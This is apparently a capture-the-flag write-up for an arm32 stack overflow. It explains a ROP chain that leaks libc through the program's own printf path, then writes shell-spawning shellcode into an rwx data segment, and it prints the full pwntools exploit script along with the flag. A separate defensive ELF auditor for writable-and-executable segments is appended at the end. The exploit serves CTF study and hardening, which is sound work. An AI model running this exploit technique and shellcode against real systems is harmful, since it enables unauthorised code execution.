# [Pwn] pwn1 - cpt.shao

xp0int, posted on Apr 29 2021

A simple arm32 stack overflow; the only time sink was finding gadgets. No gadget that sets r0 could be found.

Note that `0x104d8` is the program's own existing printf logic:

```
.text:000104D0 LDR     R3, =(aInput - 0x104DC) ; "input: "
.text:000104D4 ADD     R3, PC, R3              ; "input: "
.text:000104D8 MOV     R0, R3                  ; format
.text:000104DC BL      printf
.text:000104E0 SUB     R3, R11, #-buf
.text:000104E4 MOV     R2, #0x300              ; nbytes
.text:000104E8 MOV     R1, R3                  ; buf
.text:000104EC MOV     R0, #0                  ; fd
.text:000104F0 BL      read
.text:000104F4 MOV     R3, #0
.text:000104F8 MOV     R0, R3
.text:000104FC SUB     SP, R11, #4
.text:00010500 POP     {R11,PC}
```

Here printf takes its argument from r3, and a gadget that sets r3 is available: `0x10348: pop {r3, pc}`.

Set r3 to a GOT address and jump to `0x104d8` above: this leaks libc and at the same time performs the next read. Note that after this runs, sp can also be moved elsewhere (the overwritten saved r11 decides where the next frame lives). Looking at vmmap shows that the program's data segment is, surprisingly, rwx. So the approach is to set the read destination to point at `0x21000` in the data segment, send the shellcode, and once the read returns jump directly into the data segment to execute it.

```python
# flag{AoCiUtzYFsh4KhLXdiTATxEvKx}
import sys
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
context.endian = "little"
context.arch = 'arm'
env = {'LD_PRELOAD': ''}
context.log_level = "debug"

if len(sys.argv) == 1:
    p = process('')
elif len(sys.argv) == 3:
    p = remote(sys.argv[1], sys.argv[2])

gdbcmd = "set $BSS=0x606020\n"  # set addr variable here to easily access in gdb
# 0x555555554000

se = lambda data: p.send(data)
sa = lambda delim, data: p.sendafter(delim, data)
sl = lambda data: p.sendline(data)
sla = lambda delim, data: p.sendlineafter(delim, data)
sea = lambda delim, data: p.sendafter(delim, data)
rc = lambda numb=4096: p.recv(numb)
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
uu32 = lambda data: u32(data.ljust(4, b'\0'))
uu64 = lambda data: u64(data.ljust(8, b'\0'))
info_addr = lambda tag, addr: p.info(tag + ': {:#x}'.format(addr))

# gdb.attach(p, gdbcmd)

# Stage 1: overwrite saved r11 (frame pointer) so the next read lands at 0x21000,
# then pop a GOT address into r3 and re-enter the printf/read path at 0x104d8.
rop = b""
rop += p32(0x10348)   # pop {r3, pc}
rop += p32(0x2100c)   # GOT entry to print
rop += p32(0x104d8)   # printf(r3) followed by read() into the new frame
sla(b"input: ", cyclic(256) + p32(0x21000 + 260) + rop)

# printf prints the GOT entry: 4 bytes of libc pointer.
leak = uu32(rc(4))
info_addr("leak", leak)
libc = leak - 0x3d39c
info_addr("libc", libc)

# Stage 2: the second read writes into the rwx data segment at 0x21000.
# Layout: shellcode padded to 0x100, then saved r11 (0), then pc = 0x21000.
sc = asm("mov r0, r0;\n" * 0x10 + shellcraft.linux.sh())
print(hexdump(sc))
sl(sc.ljust(0x100, b"\0") + p32(0) + p32(0x21000))
p.interactive()
```
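The decisive weakness here is the rwx data segment the author spotted in vmmap: with W^X enforced, the second read could still place bytes at 0x21000 but jumping there would fault. The following added example (my own code, not part of the write-up) is the check a build or review pipeline can run over any ELF before it ships: it parses the program headers directly and flags PT_LOAD segments mapped both writable and executable, plus an executable or missing PT_GNU_STACK. It goes beyond the page's arm32 case by handling ELF32 and ELF64 in either byte order. The sample images are constructed inline with a small builder, modelled on the challenge layout (text at 0x10000, data at 0x21000); the machine type, addresses and segment sizes in those samples are assumptions, not values taken from the binary.

```python
import struct
import sys

# Program-header constants from the ELF specification.
PF_X, PF_W, PF_R = 1, 2, 4
PT_LOAD = 1
PT_GNU_STACK = 0x6474E551


def parse_phdrs(elf: bytes):
    """Return the program headers of an ELF32/ELF64 image as a list of dicts."""
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    ei_class, ei_data = elf[4], elf[5]
    end = "<" if ei_data == 1 else ">"
    if ei_class == 1:  # ELF32: e_phoff at 0x1c, e_phentsize/e_phnum at 0x2a
        (e_phoff,) = struct.unpack_from(end + "I", elf, 0x1C)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", elf, 0x2A)
        fmt = end + "IIIIIIII"
        order = ("type", "offset", "vaddr", "paddr", "filesz", "memsz", "flags", "align")
    elif ei_class == 2:  # ELF64: e_phoff at 0x20, e_phentsize/e_phnum at 0x36
        (e_phoff,) = struct.unpack_from(end + "Q", elf, 0x20)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", elf, 0x36)
        fmt = end + "IIQQQQQQ"
        order = ("type", "flags", "offset", "vaddr", "paddr", "filesz", "memsz", "align")
    else:
        raise ValueError("unknown ELF class %d" % ei_class)
    phdrs = []
    for i in range(e_phnum):
        vals = struct.unpack_from(fmt, elf, e_phoff + i * e_phentsize)
        phdrs.append(dict(zip(order, vals)))
    return phdrs


def audit_wx(elf: bytes):
    """Return human-readable findings for W+X mappings; an empty list means W^X holds."""
    findings = []
    saw_gnu_stack = False
    for ph in parse_phdrs(elf):
        if ph["type"] == PT_LOAD and ph["flags"] & (PF_W | PF_X) == (PF_W | PF_X):
            findings.append("PT_LOAD at %#x is writable and executable (flags=%#x)"
                            % (ph["vaddr"], ph["flags"]))
        if ph["type"] == PT_GNU_STACK:
            saw_gnu_stack = True
            if ph["flags"] & PF_X:
                findings.append("PT_GNU_STACK requests an executable stack")
    if not saw_gnu_stack:
        findings.append("no PT_GNU_STACK header: the kernel may default to an executable stack")
    return findings


def build_elf32(segments, endian="<"):
    """Construct a minimal ELF32 image (header + program headers only) for testing.

    segments: iterable of (p_type, p_offset, p_vaddr, size, p_flags). Constructed sample,
    not a real binary; e_machine 40 (ARM) and the entry point are assumed values.
    """
    phoff, phentsize = 52, 32
    ident = b"\x7fELF" + bytes([1, 1 if endian == "<" else 2, 1, 0]) + b"\0" * 8
    ehdr = ident + struct.pack(endian + "HHIIIIIHHHHHH",
                               2, 40, 1, 0x10000, phoff, 0, 0x5000400,
                               52, phentsize, len(segments), 40, 0, 0)
    phdrs = b"".join(struct.pack(endian + "IIIIIIII", t, off, va, va, sz, sz, fl, 0x1000)
                     for (t, off, va, sz, fl) in segments)
    return ehdr + phdrs


# Constructed sample mirroring the write-up's situation: text RX, data RWX.
SAMPLE_RWX = build_elf32([
    (PT_LOAD, 0, 0x10000, 0x1000, PF_R | PF_X),
    (PT_LOAD, 0x1000, 0x21000, 0x1000, PF_R | PF_W | PF_X),
    (PT_GNU_STACK, 0, 0, 0, PF_R | PF_W),
])

# Same layout with the data segment mapped RW only, as a correctly linked binary would be.
SAMPLE_HARDENED = build_elf32([
    (PT_LOAD, 0, 0x10000, 0x1000, PF_R | PF_X),
    (PT_LOAD, 0x1000, 0x21000, 0x1000, PF_R | PF_W),
    (PT_GNU_STACK, 0, 0, 0, PF_R | PF_W),
])


def audit_file(path):
    """Audit an ELF on disk; returns the findings list (usable from a CI script)."""
    with open(path, "rb") as f:
        return audit_wx(f.read())


if __name__ == "__main__":
    for path in sys.argv[1:]:
        for line in audit_file(path) or ["OK: W^X holds"]:
            print("%s: %s" % (path, line))
```

On a real binary the same information is visible with `readelf -lW`, where a segment with flags `RWE` is exactly what this audit reports; the fix belongs at link time (not placing writable data in an executable segment, and linking with a non-executable stack), not in any runtime patch.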